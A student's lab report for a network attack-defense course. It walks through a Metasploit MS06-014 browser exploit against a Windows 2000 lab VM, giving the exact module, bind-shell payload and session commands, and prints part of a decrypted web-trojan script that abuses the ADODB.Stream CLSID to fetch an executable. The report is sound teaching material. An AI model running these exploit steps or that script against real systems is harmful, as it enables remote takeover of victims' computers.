目录

(20222958 2022-2023-2 《网络攻防实践》实践十一报告)

目录

1. 实践内容

（1）web浏览器渗透攻击

任务：使用攻击机和Windows靶机进行浏览器渗透攻击实验，体验网页木马构造及实施浏览器攻击的实际过程。

实验步骤：

①选择使用Metasploit中的MS06-014渗透攻击模块

②选择PAYLOAD为任意远程Shell连接

③设置服务器地址和URL参数，运行exploit，构造出恶意网页木马脚本

④在靶机环境中启动浏览器，验证与服务器的连通性，并访问而已网页木马脚本URL

⑤在攻击机的Metasploit软件中查看渗透攻击状态，并通过成功渗透攻击后建立起的远程控制会话SESSION，在靶机上远程执行命令
（2）取证分析实践—网页木马攻击场景分析

实践过程：

①首先你应该访问start.html，在这个文件中给出了new09.htm的地址，

②在进入 htm 后，每解密出一个文件地址，请对其作 32 位 MD5 散列，以散列值为文件名到
http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件(注意:文件名中的英文字母为小写，且没有扩展名)，即为解密出的地址对应的文件。

③如果解密出的地址给出的是网页或脚本文件，请继续解密。

④如果解密出的地址是二进制程序文件，请进行静态反汇编或动态调试。

⑤重复以上过程直到这些文件被全部分析完成。

（3）攻防对抗实践—web浏览器渗透攻击攻防

攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码，并进行混淆处理之后组装成一个URL，通过具有欺骗性的电子邮件发送给防守方。

防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态，并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

2. 实践过程

2.1 web浏览器渗透攻击

查看攻击机和靶机IP地址并测试其联通性
Win2k

Kali

在Kali中执行命令msfconsole打开Metasploit

执行命令search ms06-014查找使用的漏洞

执行命令
use exploit/windows/browser/ie_createobject
进入该渗透攻击模块。

执行命令show payloads查看payloads。

执行命令set payload windows/shell/bind_tcp，选择常用PAYLOAD为windows/shell/bind_tcp。

执行命令set Lhost 192.168.13.2设置本地IP为攻击机。然后输入exploit开始攻击，恶意服务器建立。

在靶机环境中启动浏览器访问这个恶意URL：
http://192.168.13.2:8080/frAvI7

回到攻击机上可以看到，一个靶机到攻击机的session被建立

执行命令sessions -i 1打开会话，然后输入ipconfig可以查看到靶机的IP等信息

2.2 取证分析实践—网页木马攻击场景分析

从这两处可以看出 start.html 文件在引用 new09.htm 文件时没有写绝对路径，所以new09.htm 文件与 start.html 文件在同一目录下。

可以看到 new09.htm 文件中，用 iframe 引用了一个 http://aa.18dd.net/aa/kl.htm 文件，又用 javascript 引用了一个 http://js.users.51.la/1299644.js 文件。 对http://aa.18dd.net/aa/kl.htm和http://js.users.51.la/1299644.js分别求散列值， 求得的md5散列值分别为7f60672dcd6b5e90b6772545ee219bd3和23180a42a2ff1192150231b44ffdf3d3   在hashed文件中找到对应的文件，用记事本打开。 23180a42a2ff1192150231b44ffdf3d3 中的内容如下，提示不是我们要找的内容。  7f60672dcd6b5e90b6772545ee219bd3的内容：  看起来很复杂，但实际上这是一种被称为 XXTEA+Base64 的加密方法，对付这种加密方法，我们只要找到它的加密密钥就可以。注意倒数第三行  xxtea_decrypt 函数的第二个参数 \x73\x63\x72\x69\x70\x74 就是密钥。简单用16进制转换一下，得到密钥是script。  访问 http://www.cha88.cn/safe/xxtea.php （访问不了）。使用xxtea在线解密网站。输入秘钥密钥 script ，在下面大的文本框中粘贴7f60672dcd6b5e90b6772545ee219bd3.txt的全部内容，解密得到十六进制加密。在对对引号中的内容进行解密，得到如下结果，将结果保存：  再对解密得到的16进制信息进行字符转换  function init(){document.write();} window.onload = init; if(document.cookie.indexOf('OK')==-1){ try{var e; var ado=(document.createElement("object")); ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var as=ado.createobject("Adodb.Stream","")} catch(e){}; finally{ var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString(); if(e!="[object Error]"){ document.write("ziWvENv
可以看到其中使用到document.location加载了payload，并且下一行中后面跟了一个可执行文件DlkweHFtwrOYQgbKo.exe，这个可执行文件是以攻击机为服务器，通过网页下载到靶机上的。为了躲避杀毒软件，每次加载恶意网页生成的可执行文件的名字是不一样的。

BD96C556-65A3-11D0-983A-00C04FC29E36 是漏洞MS06-014中的clsid变量，搜索 BD96C556，可知攻击者使用的漏洞是MS06-014。

3. 学习中遇到的问题及解决

问题：取证木马分析实验中，打开程序漏洞文件会被系统误删
解决：关闭防火墙

4. 实践总结

这次作业十分艰难，涉及面广、难度大，难以完全独立完成。很多内容是在同学的指导下完成的。

参考资料

《网络攻防技术与实践》